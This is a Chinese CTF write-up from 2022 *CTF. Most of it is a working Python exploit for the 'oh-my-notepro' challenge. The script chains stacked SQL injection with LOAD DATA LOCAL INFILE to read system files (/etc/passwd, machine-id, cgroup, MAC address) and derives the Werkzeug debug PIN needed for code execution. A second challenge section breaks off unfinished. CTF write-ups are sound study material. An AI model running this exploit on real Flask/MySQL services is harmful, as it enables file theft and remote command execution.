2022-starCTF

前言

跟着 EDI 打了,但是感觉环境挺坑的。

oh-my-notepro

用弱口令登录账号后,通过 create 一个 note 再查询它,发现

http://123.60.72.85:5002/view?note_id=p1ee659ofrlcro12mm3kp9ey5hwg464d

报错页面是 flask 的 debug 报错页面,并且存在 sql 的堆叠注入(截图:image-20220417153125977)

因为是python的语言,比较有限,因此现在的思路就是读取文件伪造一下pin码:

exp如下:

import random
import requests
import string
import re
import hashlib
from itertools import chain
def pin_mes():
    """Read the host facts the Werkzeug PIN derivation needs off the target.

    Each path in ``pin_me`` is pulled through the same injectable ``note_id``
    parameter in three requests: create a scratch table, ``LOAD DATA LOCAL
    INFILE`` the file into it, then UNION-select the rows back out with
    ``group_concat``.  The file contents are then scraped from an ``<h1>`` in
    the response body (the page the write-up above describes as the Flask
    debug error page).

    Returns:
        list[list[str]]: one entry per path in ``pin_me``, in the same order;
        each entry is the list of regex captures (empty when nothing matched).

    NOTE(review): every step depends on a server-side misconfiguration that
    is independently detectable and fixable: stacked queries being accepted,
    MySQL ``local_infile`` being enabled for the application account, and the
    Werkzeug debugger being reachable on the error page.
    """
    s = requests.session()
    url = "http://121.37.153.47:5002/view?note_id="
    # Cookie of an already logged-in account (presumably the weak-password
    # login described above) — the view endpoint needs an authenticated session.
    session = "session=eyJjc3JmX3Rva2VuIjoiZWJiZmZjNDFlNGQ5YzQxODFjMDZhYTBjNWZjZjIyZDg2NzAzMTZkMyIsInVzZXJuYW1lIjoiYSJ9.YlpPdw.4WCCNhQrbYsuRjp00IeRuAtJZ7U"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Cookie": session,
        "Upgrade-Insecure-Requests": "1"
    }
    # Inputs of the Werkzeug PIN:
    # 1. username
    # 2. uuidnode: the MAC address of the current interface as a decimal integer
    # 3. machine_id: the Docker machine id
    # For a Docker target the original comment says the machine id is the
    # concatenation of 1. /etc/machine-id 2. /proc/sys/kernel/random/boot_id
    # 3. /proc/self/cgroup — note that boot_id is not requested below; only
    # /etc/machine-id and the cgroup file are fetched and later joined.
    pin_me = ['/etc/passwd', '/sys/class/net/eth0/address', '/etc/machine-id', '/proc/self/cgroup']
    mess = []
    # Non-greedy capture of the <h1> body.  The pattern spans several source
    # lines, so the literal newlines around the tags are part of the regex
    # and `.` does not cross them: the body must sit on its own line.
    find_data = re.compile(r"""
<h1 style=\"text-align: center\">
(.*?)
</h1>
""")
    for i in pin_me:
        # Random 7-char table name per file — presumably to avoid clashing
        # with tables left over from earlier runs.
        ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 7))
        # `%23` is a URL-encoded `#`, which comments out the rest of the
        # original query after the injected statement.
        payload = f"1';CREATE TABLE {ran_str} (go TEXT)%23"
        s.get(url + payload, headers=headers)
        payload2 = f"1';load data local infile \"{i}\" into table {ran_str}%23"
        s.get(url + payload2, headers=headers)
        # group_concat joins the file's rows into one comma-separated string,
        # which is what the callers parse.
        payload3 = f"1'union select 1,2,3,4,group_concat(go) from {ran_str}%23"
        r = s.get(url + payload3, headers=headers).text
        #print(r)
        data = re.findall(find_data, r)
        mess.append(data)
    return mess

def get_pypin(gd, ma, cg):
    """Derive a Werkzeug debugger PIN from the given host facts and print it.

    The digest mirrors Werkzeug's PIN derivation: the "probably public" bits
    (username, module name, app class name, path of flask/app.py) are hashed
    together with the "private" bits (MAC address in uuid.getnode() decimal
    form, machine-id concatenated with the container id), the digest is
    salted, and the first nine digits of the decimal digest are grouped with
    dashes.

    Args:
        gd: MAC address as a decimal integer (uuid.getnode() form).
        ma: contents of /etc/machine-id.
        cg: container id taken from /proc/self/cgroup.

    Returns:
        None.  The PIN is written to stdout, not returned.
    """
    bits = (
        'ctf',  # username
        'flask.app',  # modname
        'Flask',  # getattr(app, '__name__', ...)
        '/usr/local/lib/python3.8/site-packages/flask/app.py',  # getattr(mod, '__file__', None)
        f'{gd}',  # str(uuid.getnode())
        f'{ma+cg}',  # get_machine_id(): machine-id + cgroup id
    )

    digest = hashlib.sha1()
    for piece in bits:
        if not piece:
            continue
        digest.update(piece.encode('utf-8') if isinstance(piece, str) else piece)
    digest.update(b'cookiesalt')

    # Werkzeug derives its cookie name at this point; kept for parity with
    # the reference algorithm even though nothing here reads it.
    cookie_name = '__wzd' + digest.hexdigest()[:20]

    digest.update(b'pinsalt')
    num = ('%09d' % int(digest.hexdigest(), 16))[:9]

    # Group the digits with the largest size that divides evenly; with nine
    # digits that is always groups of three.  Fall back to the raw digits.
    rv = num
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            rv = '-'.join(
                num[i:i + group_size].rjust(group_size, '0')
                for i in range(0, len(num), group_size)
            )
            break

    print(rv)

if __name__ == "__main__":
    # Indexes follow pin_me in pin_mes(): 0 = /etc/passwd (fetched but not
    # used here), 1 = MAC address, 2 = /etc/machine-id, 3 = /proc/self/cgroup.
    pin_data = pin_mes()
    print(pin_data[1])
    # "aa:bb:cc:dd:ee:ff" -> hex digits without colons -> decimal integer,
    # the form uuid.getnode() returns.  ValueError if the capture is empty
    # or not a MAC.
    gd = int("".join("".join(pin_data[1]).split(":")), 16)
    ma = str("".join(pin_data[2]))
    # Container id: the text after "docker/" up to the next comma, the comma
    # being the group_concat row separator.  [0] raises IndexError when the
    # target's cgroup output has no "docker/" entry.
    cg = re.findall(r"docker/(.*?),", str(pin_data[3]))[0]
    get_pypin(gd, ma, cg)

拿到pin码以后就可以执行命令

然后比较奇怪的地方就是,有的时候console页面会显示not found,这里出题人给出的意见是

清除缓存即可。

oh-my-lotto

拿到flag的条件是让forecast==lotto_result,因此

Author

vague huang

Posted on

2022-04-17

Updated on

2022-04-18
